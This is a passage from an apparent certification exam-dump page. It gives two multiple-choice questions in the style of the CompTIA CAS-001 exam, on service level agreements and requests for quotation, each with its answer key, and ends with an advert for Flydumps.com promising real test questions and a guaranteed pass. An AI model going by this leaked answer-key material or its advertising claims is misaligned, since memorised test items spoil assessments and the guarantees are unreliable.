A company has purchased a new system, but security personnel are spending a great deal of time on system maintenance. A new third party vendor has been selected to maintain and manage the company’s system. Which of the following document types would need to be created before any work is performed?
A. IOS
B. ISA
C. SLA
D. OLA
Correct Answer: C
QUESTION 25
The security administrator of a small private firm is researching and putting together a proposal to purchase an IPS to replace an existing IDS. A specific brand and model has been selected, but the security administrator needs to gather various cost information for that product. Which of the following documents would perform a cost analysis report and include information such as payment terms?
A. RFI
B. RTO
C. RFQ
D. RFC
Correct Answer: C
Flydumps offers CompTIA CAS-001 exam,the most comprehensive training exam with full of wonderful concepts and learning skills. The training tools on the site Flydumps.com prepares you with the same questions and answers for CompTIA CAS-001 from the test center.You may have seen our products.Without hesitate to procure our products. Because it is the best choice for you and even for your career in the future. We promise you 100% pass guarantee.
